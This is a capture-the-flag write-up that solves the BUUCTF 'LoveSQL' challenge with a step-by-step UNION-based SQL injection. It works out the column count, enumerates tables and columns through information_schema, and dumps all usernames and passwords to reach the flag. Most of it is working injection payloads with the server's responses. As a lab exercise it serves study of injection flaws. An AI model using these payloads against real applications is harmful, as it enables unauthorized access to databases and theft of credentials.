
[BUUCTF][Web][極客大挑戰 2019]LoveSQL 1

Open the challenge URL. The page has two input fields; typing 123' into either one triggers a SQL error, so both are injectable. The error returned is:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123''' at line 1
The quoting in the message (''123''') shows the input is placed inside single quotes, so a single quote closes the string literal.
Try the following injection to leak the database name:
123'; database() #

Returns:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database() #'' at line 1

So stacked queries can't be used this way. (Strictly, this probe is inconclusive: database() by itself is not a statement, so "; database()" is a syntax error even where multi-statement execution is allowed; a proper test would prefix it with select.)

Try a UNION injection:
123' union select 1 #

Returns:

The used SELECT statements have a different number of columns
That means there's hope: keep adding constants to the select list until the column-count error goes away. With three columns it returns normally:
123' union select 1,2,3 #

Returns:

Login Success!

Hello 2!
Your password is '3'

So the page displays the second and third columns of the query result.

Build the query:
123' union select 1,database(),3 #

Returns:

Hello geek!

Your password is '3'

Success: the database is named geek.

Next, build a query to list the table names:
# This does not work: putting 3 after the FROM ... WHERE clause is a syntax error, because the whole select list must come before FROM
123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(),3 #
# This works: put the group_concat in the last column so the FROM ... WHERE clause follows the complete select list
123' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database() #

Returns:

Hello 2!

Your password is 'geekuser,l0ve1ysq1'
The flag is presumably in l0ve1ysq1, so enumerate that table's columns (this query filters on table_name only; adding the table_schema=database() condition used above avoids matching a same-named table in another schema):
123' union select 1,2, group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

Returns:

Hello 2!
Your password is 'id,username,password'
With the table and column names known, the data can be queried. Build the query (LIMIT applies to the whole UNION, and since username 123 matches no row, it selects directly from l0ve1ysq1):
123' union select id,username,password from l0ve1ysq1 limit 1 #
123' union select id,username,password from l0ve1ysq1 limit 2,1 #

Returns:

Hello cl4y!

Your password is 'wo_tai_nan_le'

So this works.

A faster way:
# This also works, but one row per request is slow
123' union select id,username,password from l0ve1ysq1 limit 2,1 #
# This is better: a single group_concat pulls every row in one request
123' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

Returns:

Hello 2!

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{172a03e1-ad34-4139-8e61-8cb1c747e4a8}'
Boom, got the flag: flag{172a03e1-ad34-4139-8e61-8cb1c747e4a8}
Note that group_concat(id,username,password) has no separator between the fields, which is why the rows read like 1cl4ywo_tai_nan_le; inserting a separator such as a colon between the columns keeps id, username and password unambiguous.